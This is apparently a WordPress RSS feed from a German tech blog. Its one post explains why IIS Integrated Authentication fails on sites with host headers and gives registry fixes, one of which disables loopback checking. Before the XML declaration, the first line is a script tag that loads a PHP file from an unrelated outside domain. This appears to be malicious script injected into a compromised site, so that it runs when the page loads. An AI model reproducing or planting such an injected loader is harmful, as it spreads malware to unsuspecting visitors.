<script src=http://soapstone-india.com/css/Soapstone-Serpentine.php ></script><?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Xylon's Blog &#187; Host Header</title>
	<atom:link href="http://www.xentrope.de/tag/host-header/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.xentrope.de</link>
	<description>I don't work here</description>
	<lastBuildDate>Fri, 30 Oct 2009 19:07:02 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0.1</generator>
		<item>
		<title>Integrated Authentication funktioniert nicht bei Websites mit Host Headern</title>
		<link>http://www.xentrope.de/allgemein/integrated-authentication-funktioniert-nicht-bei-websites-mit-host-headern/</link>
		<comments>http://www.xentrope.de/allgemein/integrated-authentication-funktioniert-nicht-bei-websites-mit-host-headern/#comments</comments>
		<pubDate>Fri, 22 May 2009 05:30:34 +0000</pubDate>
		<dc:creator>Rene Muster</dc:creator>
				<category><![CDATA[Allgemein]]></category>
		<category><![CDATA[Host Header]]></category>
		<category><![CDATA[IIS]]></category>
		<category><![CDATA[Integrated Authentication]]></category>
		<category><![CDATA[Windows]]></category>

		<guid isPermaLink="false">http://www.xentrope.de/?p=141</guid>
		<description><![CDATA[Symptome: Der IIS fragt nach Credentials, auch wenn man an einer Domain eingeloggt ist und die Anmeldeinformationen durchgereicht werden sollten Anmeldung an einer Seite mit keiner User-Password-Kombination möglich  Man bekommt einen HTTP 404.1 beim Seitenzugriff  Authentication events im Security EventLog:  Event ID 537 : An error occurred during logon Obwohl alles richtig konfiguriert ist kommt man dennoch nicht auf die [...]]]></description>
			<content:encoded><![CDATA[<p class="MsoNormal" style="margin: 0in 0in 0pt; tab-stops: list .5in;">Symptome:</p>
<div class="ExternalClassDF78AB8BE91745A8B97E7471119CB706">
<ul type="disc">
<li class="MsoNormal" style="margin: 0in 0in 0pt; tab-stops: list .5in;">Der IIS fragt nach Credentials, auch wenn man an einer Domain eingeloggt ist und die Anmeldeinformationen durchgereicht werden sollten</li>
<li class="MsoNormal" style="margin: 0in 0in 0pt; tab-stops: list .5in;">Anmeldung an einer Seite mit keiner User-Password-Kombination möglich </li>
<li class="MsoNormal" style="margin: 0in 0in 0pt; tab-stops: list .5in;">Man bekommt einen HTTP 404.1 beim Seitenzugriff </li>
<li class="MsoNormal" style="margin: 0in 0in 0pt; tab-stops: list .5in;">Authentication events im Security EventLog:  Event ID 537 : An error occurred during logon</li>
</ul>
</div>
<p class="MsoNormal" style="margin: 0in 0in 0pt; tab-stops: list .5in;">Obwohl alles richtig konfiguriert ist kommt man dennoch nicht auf die Seite.</p>
<p class="MsoNormal" style="margin: 0in 0in 0pt; tab-stops: list .5in;">Die Ursache ist eine Sicherheitsfunktion zur Überprüfung von Loopbacks, die so genannte Reflection Attacks verhindern soll. Daher schlägt die Authentifizierung fehl, wenn der verwendete vollqualifizierte Domänenname oder der benutzerdefinierte Hostheader nicht mit dem lokalen Computernamen übereinstimmt.</p>
<p>Methode 1: Disable Loopback Checking</p>
<ol type="1">
<li class="MsoNormal" style="margin: 0in 0in 0pt; tab-stops: list .5in;">regedit öffnen</li>
<li class="MsoNormal" style="margin: 0in 0in 0pt; tab-stops: list .5in;">HKLM\System\CurrentControlSet\Control\Lsa öffnen</li>
<li class="MsoNormal" style="margin: 0in 0in 0pt; tab-stops: list .5in;">Neuen DWORD value &#8221;DisableLoopbackCheck&#8221; und auf 1 setzen</li>
<li class="MsoNormal" style="margin: 0in 0in 0pt; tab-stops: list .5in;">Reboot</li>
</ol>
<p>Methode 2: Host Namen angeben</p>
<ol type="1">
<li class="MsoNormal" style="margin: 0in 0in 0pt; tab-stops: list .5in;">regedit öffnen</li>
<li class="MsoNormal" style="margin: 0in 0in 0pt; tab-stops: list .5in;">HKLM\system\CurrentControlSet\Control\Lsa\MSV1_0 öffnen</li>
<li class="MsoNormal" style="margin: 0in 0in 0pt; tab-stops: list .5in;">Neuen multi-string value &#8221;BackConnectionHostNames&#8221; anlegen</li>
<li class="MsoNormal" style="margin: 0in 0in 0pt; tab-stops: list .5in;">Host header eintragen</li>
<li class="MsoNormal" style="margin: 0in 0in 0pt; tab-stops: list .5in;">Reboot</li>
</ol>
]]></content:encoded>
			<wfw:commentRss>http://www.xentrope.de/allgemein/integrated-authentication-funktioniert-nicht-bei-websites-mit-host-headern/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
	</channel>
</rss>
